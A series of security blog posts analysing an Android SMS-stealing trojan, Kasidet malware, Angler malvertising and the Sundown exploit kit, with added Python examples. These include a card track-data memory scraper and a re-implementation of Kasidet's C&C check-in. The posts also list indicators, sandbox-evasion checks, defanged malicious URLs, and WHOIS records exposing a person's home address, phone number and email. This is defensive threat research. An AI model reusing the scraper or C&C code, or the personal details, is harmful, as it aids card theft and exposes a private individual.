Wednesday, February 10, 2016

Fake Security App for AliPay customers - Android SMS Stealer


During an ongoing analysis to protect our customers from the latest mobile threats, we came across an Android malware sample that disguised itself as a security feature for the well-known Chinese online payment app AliPay. Upon analysis, we discovered that the fake app is an SMS-stealing Trojan.

The malware developers targeted AliPay because of its large customer base.

Alipay is a third-party online payment platform that charges no transaction fees and works with more than 65 financial institutions, including Visa and Mastercard. Globally, more than 300 merchants accept Alipay, and it currently supports transactions in 14 major foreign currencies. Alipay is often described as the PayPal of the East.


Fake AliPay Security Controls App

Appname (app label) : 安全控件
Md5 : fad55b4432ed9eeb5d7426c55681586c
Package Name : com.bing.receive
VirusTotal detection : 2/55 (at the time of analysis)

The app presents itself as "Security Controls", tricking the victim into thinking it is an app that enhances AliPay security. Once launched, the app hides itself and its icon disappears, a common technique for malware to stay out of sight. The malware then registers Android services which steal incoming SMS messages and forward them to the Command and Control (C&C) server.


Technical details 

Once installed, the app presents itself as part of the AliPay family.

App Icon

As soon as the victim tries to use the app, it displays an introductory screen that is programmed to disappear after 3 seconds. At that point both the screen and the launcher icon are gone.

Introductory Screen


The victim might assume the app was faulty and silently removed by the Android OS. Little do they know that the malware is now active in the background and carries out its tasks through services.

Android services are components that run in the background and perform long-running tasks without the user's knowledge. The malware defines and uses the following services:
  • MyService
  • DealService
  • TestService
The malware also registers a few broadcast receivers. Broadcast receivers are Android components that act when the particular events they are registered for occur.

Following are the receivers registered by malware:

  • System Boot Receiver 
  • Massage Receiver (Note the typo - Massage instead of Message)
  • Screen-On Receiver
The MainActivity of the malware hides the icon and starts the service named MyService.


Main Activity
As soon as MyService is started, it initiates the other tasks and registers SystemBootReceiver and MassageReceiver.

MyService Service
MassageReceiver is a broadcast receiver triggered whenever an SMS is received. Its main task is to fetch the details of each incoming SMS message; once fetched, it starts DealService and passes the SMS data along with the call.

MassageReceiver Broadcast Receiver
DealService's task is to take the SMS messages from the receiver and send them to the C&C server. It starts an asynchronous task (AsyncTask, as shown in the screenshot below) which forwards the messages to the C&C server in a POST request.

Fetching SMS and POST request
SMS details are sent to the C&C server in a POST request, as seen in the screenshot below. Unfortunately the C&C server had already been taken down at the time of analysis, so further details about the campaign could not be obtained.

SMS data sent to CnC

Along with MassageReceiver, another receiver named SystemBootReceiver provides the malware's persistence, making sure it keeps doing its job across reboots.

SystemBootReceiver is a broadcast receiver triggered at every system boot. Its main task is to make sure MyService is up and running; at every reboot it starts MyService, as seen below:
System Boot Receiver

The main motive of the malware developer was to collect SMS messages from the victim's phone. The author's end goal is unknown at present, but we will be actively looking for further traces of this campaign.

Work Flow of Malware: 

Work Flow
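The component pattern described above (SMS receiver, boot receiver, background services, network access) is what an analyst looks for first when triaging a decoded manifest. The script below is an added example, not code from the original post or from the malware. The package name and component names come from the post; the permissions, the intent-filter priority and the rest of the manifest are assumptions. The post says MyService registers the receivers; a BOOT_COMPLETED receiver still has to be declared in the manifest to fire, so the constructed manifest assumes both receivers are declared there. Receivers registered only at runtime via registerReceiver() would not be visible to this check.

```python
# Added example (not code from the original post or from the malware): static
# triage of a decoded AndroidManifest.xml for the component pattern described
# above. The manifest text is constructed; the package and component names come
# from the post, every other attribute is an assumption.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_ACTION = "android.provider.Telephony.SMS_RECEIVED"
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.bing.receive">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="安全控件">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".MyService"/>
    <service android:name=".DealService"/>
    <service android:name=".TestService"/>
    <receiver android:name=".MassageReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SystemBootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed benign manifest for comparison: a launcher activity and network access only.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _qualify(pkg, name):
    # Component names starting with '.' are relative to the package.
    return pkg + name if name.startswith(".") else name


def triage_manifest(xml_text):
    """Return the permissions, services and receivers of interest plus a set of flags."""
    root = ET.fromstring(xml_text)
    pkg = root.get("package", "")
    perms = {_attr(p, "name") for p in root.iter("uses-permission")}
    services = [_qualify(pkg, _attr(s, "name")) for s in root.iter("service")]

    sms_receivers, boot_receivers = [], []
    for rcv in root.iter("receiver"):
        name = _qualify(pkg, _attr(rcv, "name"))
        actions = {_attr(a, "name") for a in rcv.iter("action")}
        if SMS_ACTION in actions:
            sms_receivers.append(name)
        if BOOT_ACTION in actions:
            boot_receivers.append(name)

    flags = set()
    if "android.permission.RECEIVE_SMS" in perms and sms_receivers:
        flags.add("sms_interception")
    if boot_receivers:
        flags.add("boot_persistence")
    if "android.permission.INTERNET" in perms and sms_receivers:
        flags.add("network_exfil_capable")
    # Icon hiding (setComponentEnabledSetting on the launcher activity) is a runtime
    # call made from MainActivity, so it is not visible in the manifest and not flagged.
    return {"package": pkg, "permissions": perms, "services": services,
            "sms_receivers": sms_receivers, "boot_receivers": boot_receivers,
            "flags": flags}


if __name__ == "__main__":
    for label, m in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        r = triage_manifest(m)
        print(label, r["package"], sorted(r["flags"]))
```

Run against a manifest pulled out with apktool (or any decoder that produces text XML), the three flags together are the signature of this family's design: intercept SMS, survive reboot, reach a server. None of the three is malicious on its own, which is why the check reports them separately.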

Mitigations

We always advise our customers, and everyone else, not to trust apps from unknown parties and to download only from trustworthy official app stores such as Google Play.

The only official AliPay apps are those shown in the screenshot below; there is no app named AliPay Security Controls among them.


Playstore - Official AliPay Apps
Removal

Since the malware does not request Device Administrator privileges, removing it is not difficult. Note that because the launcher icon is hidden, the app will not appear on the home screen; it is still listed under Settings, where it can be found by its label (安全控件) or its package name (com.bing.receive).

The victim can remove it through the Settings menu on the Android device:
  • Settings --> Apps
  • Find the app in the list and tap it
  • Tap Uninstall
  • Tap OK
We urge users not to trust unknown links received via messages or e-mail. Additionally, disable the "Unknown Sources" option under Settings; this blocks installation of apps from outside the official store.

Friday, January 29, 2016

Malicious Office files dropping Kasidet and Dridex

Introduction 

We have covered the Dridex banking Trojan being delivered via various campaigns involving Office documents with malicious VBA macros in the past. However, over the past two weeks we have seen these malicious VBA macros also used to drop the Kasidet backdoor, in addition to Dridex, on infected systems. The malicious Office documents are spread as attachments to spear-phishing e-mails, as described here. The macro inside the Office document is obfuscated, as shown in the code snapshot below:

Macro code
The macro downloads the malware payload from a hardcoded URL. We have seen the following URLs used in the different document payloads captured for this campaign:

  •       armandosofsalem[.]com/l9k7hg4/b4387kfd[.]exe
  •       trinity.ad-ventures[.]es/l9k7hg4/b4387kfd[.]exe
  •       188.226.152[.]172/l9k7hg4/b4387kfd[.]exe


In this blog, we will provide a detailed analysis for the Kasidet variant that we spotted in this campaign.

Kasidet Analysis

Installation: 
Kasidet installs itself into the %APPDATA% folder, creating a new folder there named "Y1FeZFVYXllb"; this string is hardcoded in the malware. The same string is used as the mutex name and in the registry entry created to ensure persistence across reboots, so a folder, mutex and registry entry with that fixed name are straightforward host indicators for this variant.

AntiVM Check:
Kasidet tries to detect analysis systems during execution through the following checks. It checks for a debugger with the IsDebuggerPresent and CheckRemoteDebuggerPresent Windows APIs, and it looks for the following popular sandbox-related strings:

User Name: "MALTEST",  "TEQUILABOOMBOOM", "SANDBOX", "VIRUS", "MALWARE"
File Name: "SAMPLE", "VIRUS", "SANDBOX"

It tries to detect Wine by checking whether kernel32.dll exports the wine_get_unix_file_name function. It detects VMware, VirtualBox, QEMU and Bochs by checking for the following registry entries (key, value name, and the string looked for in that value; a key listed alone is checked for existence):

VMware
  SOFTWARE\VMware, Inc.\VMware Tools
  HARDWARE\DEVICEMAP\Scsi\Scsi Port\Scsi Bus\Target Id\Logical Unit Id, "Identifier", "VMware"
  HARDWARE\DEVICEMAP\Scsi\Scsi Port\Scsi Bus\Target Id\Logical Unit Id, "Identifier", "VBOX"

VirtualBox
  HARDWARE\Description\System, "SystemBiosVersion", "VBOX"
  SOFTWARE\Oracle\VirtualBox Guest Additions
  HARDWARE\Description\System, "VideoBiosVersion", "VIRTUALBOX"

QEMU
  HARDWARE\DEVICEMAP\Scsi\Scsi Port\Scsi Bus\Target Id\Logical Unit Id, "Identifier", "QEMU"
  HARDWARE\Description\System, "SystemBiosVersion", "QEMU"

Bochs
  HARDWARE\Description\System, "SystemBiosVersion", "BOCHS"

Information Stealing capabilities:

Kasidet uses the following two methods to steal information from the victim's machine:

1. Memory Scraping: This allows Kasidet to steal credit card data from the memory of Point-of-Sale (POS) systems. It scans the memory of all running processes except those listed below:
System
smss.exe
csrss.exe
winlogon.exe
lsass.exe
spoolsv.exe
devenv.exe

The stolen information is relayed back to the attacker using following URI format – 


d=1&id=<MachineID>&name=<SystemName>&type=<Track1 or Track2 data>&data=<stolen data>&p=< Process elevation status >

2. Browser Hooking: This allows Kasidet to steal data from web browsers. It can inject code into Firefox, Chrome and Internet Explorer (IE). Browser names are not stored in plain text; instead this variant uses the same string-hash function as the Carberp malware to obscure them. The following APIs are hooked in the web browser to steal sensitive data:

Browser   Hooked API
Firefox   PR_Write
Chrome    WSASend
IE        HttpSendRequestW, InternetWriteFile

The stolen information is relayed back to the attacker using following URI format – 

ff=1&id=<MachineID>&name=<SystemName>&host=<Base64 encoded host name>&form=< Base64 encoded HTTP header data>&browser=<Browser name>

The information-stealing features of this Kasidet variant are deactivated if the system locale or the user's GeoID corresponds to Russia.
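The memory-scraping step described under item 1 above is easier to reason about with a concrete scanner in hand. The block below is an added example, not Kasidet's own code: it runs the standard POS-scraper approach (track-format regular expressions followed by a Luhn filter on the PAN) over a byte buffer, and carries the post's own process skip list. How Kasidet itself matches track data is not stated in the post, so the regexes and the Luhn filter are assumptions; the buffer is constructed from well-known test card numbers, not real card data.

```python
# Added example (not Kasidet's own code): the memory-scraping technique described
# above, written as a scanner over a byte buffer. Regexes and Luhn filter are the
# standard approach and an assumption about Kasidet's internals; the skip list is
# the one given in the post; the buffer is constructed from test card numbers.
import re

# Process names Kasidet leaves alone (from the post).
SKIPPED_PROCESSES = {"system", "smss.exe", "csrss.exe", "winlogon.exe",
                     "lsass.exe", "spoolsv.exe", "devenv.exe"}

# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^\^?]{2,26})\^(\d{4})(\d{3})[^?]{0,100}\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})\d{0,30}\?")

SAMPLE_MEMORY = (
    b"\x00\x00" + b"A" * 16 + b"\x00"
    + b"%B4111111111111111^DOE/JOHN^25121010000000000?"   # valid Track 1
    + b"\x00\x90\x90"
    + b";5555555555554444=25121010000000000?"             # valid Track 2
    + b"\x00garbage\x00"
    + b";1234567890123456=2512101?"                       # fails Luhn -> noise
    + b"\x00"
)


def should_scan(process_name):
    """Apply the skip list from the post."""
    return process_name.lower() not in SKIPPED_PROCESSES


def luhn_ok(pan):
    """Luhn check digit validation; filters out random digit runs that match the regex."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scrape_track_data(buf):
    """Return Luhn-valid track candidates found in buf, ordered by offset."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        hits.append({"offset": m.start(), "type": "Track1",
                     "pan": m.group(1).decode(),
                     "name": m.group(2).decode(errors="replace"),
                     "expiry": m.group(3).decode()})
    for m in TRACK2_RE.finditer(buf):
        hits.append({"offset": m.start(), "type": "Track2",
                     "pan": m.group(1).decode(), "expiry": m.group(2).decode()})
    hits = [h for h in hits if luhn_ok(h["pan"])]
    hits.sort(key=lambda h: h["offset"])
    return hits


if __name__ == "__main__":
    for h in scrape_track_data(SAMPLE_MEMORY):
        masked = h["pan"][:6] + "..." + h["pan"][-4:]
        print(h["offset"], h["type"], masked, h["expiry"])
```

The same two regexes are what a defender would run over a POS process dump to confirm that cleartext track data is reachable at all; if they match on a live dump, the process is a scraping target regardless of which malware family is doing the scraping.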

Network communication:
Kasidet contains a hardcoded list of Command & Control (C&C) server locations stored in encoded form; it uses the CryptStringToBinary API to decode the embedded C&C URLs at runtime, as seen below:

Kasidet C&C list
Upon successful infection, Kasidet sends an HTTP POST request with the body "enter=1" (without quotes). All HTTP header fields (User-Agent, Content-Type and Cookie) are hardcoded in the payload itself.
Kasidet Hardcoded HTTP fields

The C&C server will not return the expected data if the HTTP header fields differ, which also keeps requests made with ordinary headers from seeing the commands. The server sends a fake 404 response code with HTML stating that the page was not found, but the C&C commands are hidden inside an HTML comment tag in the response, as seen below:

Kasidet - First communication with C&C

Kasidet will request for additional commands from the C&C server with the following POST request:

Kasidet request for additional commands

Variable   Description
cmd        Command; hardcoded in the malware payload as '1'
id         MachineGuid value fetched from the HKLM\SOFTWARE\Microsoft\Cryptography registry key
name       System name
os         Operating system version
p          Process elevation status
av         Antivirus installed on the infected system
v          Bot version, hardcoded in the malware; the version we analysed is 4.4
w          Flag indicating whether the system locale and UserGeoID are Russia
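The check-in request and the fake-404 reply described above, modelled end to end, make a useful reference when writing a network signature or an emulated C&C for a sandbox. The block below is an added example, not Kasidet's own code. The field names and their order come from the table above and the "enter=1" beacon from the text; the encoding of the p and w flags as "0"/"1", the exact placement of the command inside the HTML comment, and the 404 body are assumptions. The post says the bot matches commands by hash, which this example does not reproduce; it works on the plain command text.

```python
# Added example (not Kasidet's own code): the check-in POST and the fake-404
# reply described above. Field names/order are from the post's table; the
# "0"/"1" flag encoding, the comment layout and the 404 body are assumptions.
import re
from urllib.parse import urlencode

BOT_VERSION = "4.4"   # version string seen in the analysed sample
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)

# Constructed reply in the shape described: a 404 page carrying a command in a comment.
FAKE_404_BODY = (
    "<html><head><title>404 Not Found</title></head>"
    "<body><h1>Not Found</h1>"
    "<p>The requested URL was not found on this server.</p>"
    "<!-- rate 300 -->"
    "</body></html>"
)


def build_beacon():
    """Body of the first POST after infection."""
    return "enter=1"


def build_checkin(machine_id, system_name, os_version, elevated, av_name,
                  russian_locale, version=BOT_VERSION):
    """Body of the 'request additional commands' POST."""
    return urlencode([
        ("cmd", "1"),                            # hardcoded command value
        ("id", machine_id),                      # HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid
        ("name", system_name),
        ("os", os_version),
        ("p", "1" if elevated else "0"),         # process elevation status (encoding assumed)
        ("av", av_name),
        ("v", version),
        ("w", "1" if russian_locale else "0"),   # locale/UserGeoID is Russia (encoding assumed)
    ])


def extract_hidden_commands(status_code, body):
    """Pull commands out of the HTML comment(s) of a fake 404 reply.

    A genuine 404 carries no command comment; a 404 that does is the C&C talking.
    """
    if status_code != 404:
        return []
    return [c.strip() for c in COMMENT_RE.findall(body) if c.strip()]


def parse_command(text):
    """Split 'rate 300' into ('rate', '300'); a bare command gets an empty argument."""
    verb, _, arg = text.partition(" ")
    return verb, arg.strip()


if __name__ == "__main__":
    print(build_beacon())
    print(build_checkin("A1B2C3", "WIN7-PC", "6.1", False, "Windows Defender", False))
    for c in extract_hidden_commands(404, FAKE_404_BODY):
        print(parse_command(c))
```

For detection, the two stable pieces are the literal body "enter=1" on the first POST and a 404 whose body contains an HTML comment; a proxy that logs response bodies can flag the second without knowing the hardcoded headers.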

Like the browser names, the command strings are not stored in plain text; they are represented by hashes computed with the same function. Below are some of the important command hashes:

Command hash   Description
0x0E587A65     (rate <number>) Used in the sleep function
0x089127D3     DDoS using the HTTP protocol
0xB37A84B6     Start keylogging and screen-capture threads
0x089068E8     Download and execute an additional component; the file can be a DLL, EXE or VBS
0x4A9981B7     Search for a given process name among the processes currently running on the system
0x08D26744     Find a given file on the system and upload it to the server
0xCAB1E64A     Drop a setting.bin file and change firewall settings to download and execute a plugin component
0x0010E6C4     Execute a given command using Windows cmd.exe


Conclusion 

Malicious Office documents remain a popular vector for malware authors to deliver their payloads. Dridex authors have used this technique for over a year, and it was interesting to see the same campaign and URLs being used to deliver Kasidet payloads. While this does not establish any link between the authors of the two malware families, it reaffirms that much of the underlying infrastructure and delivery mechanism is often shared among these cyber criminals.

ThreatLabZ is actively monitoring this threat and ensuring signature coverage for Zscaler customers.

Analysis by - Abhay Yadav, Avinash Kumar and Nirmal Singh

Tuesday, January 19, 2016

Music-themed Malvertising Lead to Angler

Overview

Malvertising, or "malicious advertising," is not a new threat, and just a few weeks into 2016 ThreatLabZ observed a malvertising campaign injecting iframes into banner advertisements that lead to the Angler Exploit Kit. The Angler operators took some time off over the New Year, as noted by F-Secure, and only recently resumed operations, so we were surprised to see a malvertising campaign so soon after their break.

This post will detail aspects of this campaign, and there is a reference list of indicators at the end of this post.

OpenX/OpenAds and Malvertising

OpenAds, later renamed OpenX and continued as Revive Adserver, is an advertisement platform with a long history that is still quite popular. At a high level, when a user browses to a website that uses OpenAds to serve advertisements, small code stubs on the page make requests to the OpenAds server, which decides which banner advertisement to run and sends the banner ad plus some tracking code back to the page. Banner advertisements usually rotate on some interval, and a single ad server can serve and control advertisements for multiple domains.

Unfortunately, the nature of banner advertisements makes them highly attractive to criminal groups, since injecting malicious content into an advertisement can impact hundreds or thousands of sites. This particular campaign impacted multiple OpenAds/OpenX servers, which in turn affected hundreds of domains. Intermediary sites were used as an additional hop prior to serving the Angler landing page; only six second-level intermediary domains were observed, each using dozens of different subdomains and URIs. All six second-level intermediary domains share music-themed names:
  • everyoneismusical.com
  • musik4fingersonthemove.com
  • musik4littlefingers.com
  • youaremusical.com
  • youaremusicalforms.com
  • youaremusik.com
Interestingly, these intermediary domains only use two different IPs for all the subdomains, and the operators appear to have changed hosts suddenly. Figure 1 shows the number of hits we captured for these two IPs.

Fig 1: Hits on Intermediary Domain IPs

iframe Trampolining

The infection cycle starts with a malicious iframe injected in the banner advertisement code that references an intermediary URL. The injected iframe loads transparently, and the intermediary domain server will respond in one of the following three ways:
  • Response code 200 - iframe to Angler Exploit Kit landing page
  • Response code 204 - no content
  • Response code 404 - fake 'not found' page
If the intermediary domain serves an iframe, the Angler landing page is loaded transparently. A more complete overview of the infection cycle is shown below in Figure 2.

Fig 2: Overview of Infection Cycle
We're calling the intermediary domain an "iframe trampoline" since the server may not respond with another iframe and can simply bounce the user out of the infection cycle with benign content.

Infection Cycle

Looking at a full infection cycle in Figure 3, the benign domain 'giftsnideas.com' loads a banner ad with OpenX which contains an injected iframe to the trampoline domain. The trampoline domain's iframe finally sends the user to the Angler landing page. In this instance, the exploit failed, so no further content was loaded.

Fig 3: Relevant URLs for Exploit Cycle
Banner advertisement code on OpenAds/OpenX is very similar between servers. Figure 4 shows the injected iframe, which is simply inserted into the legitimate banner advertisement code.
Fig 4: Advertisement with Injected iframe
All trampoline domains used a very similar URL format of two alphabetic directories followed by an alphabetic JavaScript file (.js). The only content loaded in every successful instance is an iframe to the Angler landing page, as shown in Figure 5.
Fig 5: Trampoline Header and Response
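The two things described above that a defender can key on are the injected iframe sitting inside otherwise normal OpenX banner code and the trampoline's URL shape (two alphabetic directories followed by an alphabetic .js name), plus the three response types the trampoline serves. The block below is an added example, not code from the original post: it scans a banner snippet for iframes that are off-site, hidden, or trampoline-shaped, and labels a trampoline response. The second-level domain youaremusik.com is from the post; the ad-server host, the subdomain, the directory names and the OpenX delivery paths in the snippet are constructed.

```python
# Added example (not from the original post): a scanner for the injected-iframe
# pattern described above, run over a constructed OpenX-style banner snippet, and
# a classifier for the three trampoline responses. The trampoline URL shape and
# youaremusik.com are from the post; the ad host, subdomain and paths are assumed.
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Two alphabetic directories followed by an alphabetic .js file (shape given in the post).
TRAMPOLINE_PATH_RE = re.compile(r"^/[A-Za-z]+/[A-Za-z]+/[A-Za-z]+\.js$")

SAMPLE_AD = """
<a href='http://ads.example-adserver.test/www/delivery/ck.php?n=abc123' target='_blank'>
<img src='http://ads.example-adserver.test/www/delivery/avw.php?zoneid=7&amp;n=abc123' border='0' alt=''></a>
<iframe src="http://xyz.youaremusik.com/abc/def/ghi.js" width="1" height="1" style="display:none"></iframe>
<iframe src="http://ads.example-adserver.test/www/delivery/afr.php?zoneid=8" width="300" height="250"></iframe>
<div id='beacon_9f1' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://ads.example-adserver.test/www/delivery/lg.php?bannerid=42' width='0' height='0' alt=''></div>
"""


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style or "opacity:0" in style


def find_suspicious_iframes(html, ad_host):
    """Return iframes that are off-site, hidden, or point at a trampoline-shaped URL."""
    p = _IframeCollector()
    p.feed(html)
    findings = []
    for attrs in p.iframes:
        src = attrs.get("src", "")
        if not src:
            continue
        parts = urlsplit(src)
        reasons = []
        if parts.hostname and parts.hostname != ad_host:
            reasons.append("offsite")
        if _is_hidden(attrs):
            reasons.append("hidden")
        if TRAMPOLINE_PATH_RE.match(parts.path):
            reasons.append("trampoline_path")
        if reasons:
            findings.append({"src": src, "host": parts.hostname, "reasons": reasons})
    return findings


def classify_trampoline_response(status, body):
    """Map the three observed trampoline replies (200 iframe, 204, fake 404) to labels."""
    if status == 204:
        return "bounce_no_content"
    if status == 404:
        return "bounce_fake_404"
    if status == 200:
        p = _IframeCollector()
        p.feed(body)
        return "next_hop_iframe" if p.iframes else "other_200"
    return "other"


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_AD, "ads.example-adserver.test"):
        print(f["host"], f["reasons"], f["src"])
```

The ad-server's own iframe in the snippet (same host, normal size) produces no finding; the injected one trips all three checks. In practice the "offsite" reason alone is noisy for ad networks, so the combination is what should page someone.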
The Angler landing page is exactly what you'd expect and although there have been some recent changes, we won't rehash Angler in this post.
Fig 6: Angler Landing Page

Conclusion

Malvertising continues to be a highly effective means of targeting and compromising a large number of victims, and we expect this trend to continue for 2016. We noted that many of the victim sites we observed in this campaign were radio stations and auto enthusiast forums. Domains in these two groups are owned by Saga Communications and Autoforums.com, so it's likely that each uses a small number of ad servers to power the entire network of sites. ThreatLabZ will continue to monitor this campaign.

Indicators


# Hits   Second-level domain           Registrar   Registrant
23883    youaremusik.com               GODADDY     Mark Lippman
20681    musik4fingersonthemove.com    GODADDY     Mark Lippman
16878    everyoneismusical.com         GODADDY     Michael Lippman
16849    musik4littlefingers.com       GODADDY     Mark Lippman
5698     youaremusical.com             GODADDY     Michael Lippman
1619     youaremusicalforms.com        GODADDY     Michael Lippman

URL IPs

188.227.72.137 - IT-Grad nets - AS48096
188.227.74.150 - IT-Grad nets - AS48096


List of FQDNs and URLs

Counts and FQDNs - via Pastebin (http://pastebin.com/7vSYi2uz)
URLs - via Pastebin (http://pastebin.com/QN9WqzPn)

Whois Samples

Domain Name: MUSIK4LITTLEFINGERS.COM
Registry Domain ID: 1916653940_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2015-04-05T16:22:42Z
Creation Date: 2015-04-05T16:22:42Z
Registrar Registration Expiration Date: 2018-04-05T16:22:42Z
Registrant Name: Mark Lippman
Registrant Organization:
Registrant Street: 4 Cloverbrooke Court
Registrant City: Potomic
Registrant State/Province: Maryland
Registrant Postal Code: 20854
Registrant Country: US
Registrant Phone: +1.2404294083
Registrant Phone Ext:
Registrant Fax: +1.1
Registrant Fax Ext:
Registrant Email: mhlippman@gmail.com
Registry Admin ID:
Admin Name: Mark Lippman
Admin Organization:
Admin Street: 4 Cloverbrooke Court
Admin City: Potomic
Admin State/Province: Maryland
Admin Postal Code: 20854
Admin Country: US
Admin Phone: +1.2404294083
Admin Phone Ext:
Admin Fax: +1.1
Admin Fax Ext:
Admin Email: mhlippman@gmail.com
Registry Tech ID:
Tech Name: Mark Lippman
Tech Organization:
Tech Street: 4 Cloverbrooke Court
Tech City: Potomic
Tech State/Province: Maryland
Tech Postal Code: 20854
Tech Country: US
Tech Phone: +1.2404294083
Tech Phone Ext:
Tech Fax: +1.1
Tech Fax Ext:
Tech Email: mhlippman@gmail.com
Name Server: NS67.DOMAINCONTROL.COM
Name Server: NS68.DOMAINCONTROL.COM

Domain Name: EVERYONEISMUSICAL.COM
Registry Domain ID: 1917710979_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2015-06-04T12:18:00Z
Creation Date: 2015-04-08T19:34:50Z
Registrar Registration Expiration Date: 2018-04-05T11:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: 
Registrant Name: Michael Lippman
Registrant Organization: 
Registrant Street: 4 Cloverbrooke Court
Registrant City: Potomic
Registrant State/Province: Maryland
Registrant Postal Code: 20854
Registrant Country: US
Registrant Phone: +1.2404298083
Registrant Phone Ext:
Registrant Fax: 
Registrant Fax Ext:
Registrant Email: mhlippman@gmail.com
Registry Admin ID: 
Admin Name: Michael Lippman
Admin Organization: 
Admin Street: 4 Cloverbrooke Court
Admin City: Potomic
Admin State/Province: Maryland
Admin Postal Code: 20854
Admin Country: US
Admin Phone: +1.2404298083
Admin Phone Ext:
Admin Fax: 
Admin Fax Ext:
Admin Email: mhlippman@gmail.com
Registry Tech ID: 
Tech Name: Michael Lippman
Tech Organization: 
Tech Street: 4 Cloverbrooke Court
Tech City: Potomic
Tech State/Province: Maryland
Tech Postal Code: 20854
Tech Country: US
Tech Phone: +1.2404298083
Tech Phone Ext:
Tech Fax: 
Tech Fax Ext:
Tech Email: mhlippman@gmail.com
Name Server: NS37.DOMAINCONTROL.COM
Name Server: NS38.DOMAINCONTROL.COM



Tuesday, January 12, 2016

There Goes The Neighborhood - Bad Actors on GMHOST Alexander Mulgin Serginovic

Introduction

Whether they encourage it or not, some network operators become known to and favored by criminals, such as those who operate exploit kit (EK) and malware infrastructure. After following up on the Sundown EK recently pointed out by @malwareforme on the Threatglass database, we found Neutrino (looking like Angler) and other bad behavior in the same network "neighborhood".

It's not clear what reputation this hoster has within the underground community, but the Sundown and Neutrino campaigns both appeared within the same address space registered under "Alexander Mulgin Serginovic" (AMS) with the first Neutrino hits coinciding with the last few hits of Sundown's December 2015 campaign. We have not identified any link between these campaigns apart from the hoster, but we wanted to provide a quick look at some of these activities and the specific indicators we have seen.

Sundown Behavior

Other analysts have observed the emergence of the Sundown EK (aka Beta Exploit Pack), with Kafeine in particular commenting that Sundown is a very simple EK compared to the more mature kits like Angler. This continues to be the case, however we have seen that the group operating Sundown has made adjustments, including some changes that happened in the midst of this campaign.

Injects

In the campaign on ForoMTB, Sundown used a small malicious inject within one of the included JavaScript libraries:


On CinemaHD, we saw a basic IFRAME inserted directly into the page:


Gates

During December we saw the gate "millychiccolo[.]space/jhgrjhk.php", and after the new year we have seen "pienadigrazia[.]space/counter.php" though we also saw direct traffic from the compromised sites.

Landing Pages

In the past 45 days we have seen Sundown operate with various domains hosting the landing pages, but only on two different IPs: 81.94.199.16 and 185.86.77.160. The path component of the landing page has gone through several iterations. The early hits in this campaign went to "millychiccolo[.]space/?9b5b49f7f8c07f43effe4aecc67bf254". Later, the landing page path was base64-encoded, as in "millychiccolo[.]space/?OWI1YjQ5ZjdmOGMwN2Y0M2VmZmU0YWVjYzY3YmYyNTQ=". It should be noted that this base64 string decodes to the same MD5-looking value used in the first instance. Sundown changed the underlying "MD5" for the new year, and we have seen landing pages at "arbitraryh[.]top/?NjExODEzY2MzNTkyZTkyYWYxZmNlYjExODQzMzAz" (the path decodes to 611813cc3592e92af1fceb11843303, which at 30 hex characters is not actually an MD5 digest).

These are some of the domains we saw delivering Sundown landing pages, exploits, and malware payloads:
nomeatea.space
millychiccolo.space
pianolessons.co.vu
tequeryomuch.space
ilsignoreconte.space
arbitraryh.top
pienadigrazia.space

Despite the path changes, the behavior of the Sundown landing page is still quite simple: a "carpet bombing" approach in which many or all available exploits are tried, in some cases with multiple successes. An example of the exploitation flow:
ilsignoreconte[.]space/new/e/360a296ea1e0abb38f1080f5e802fb4b.html
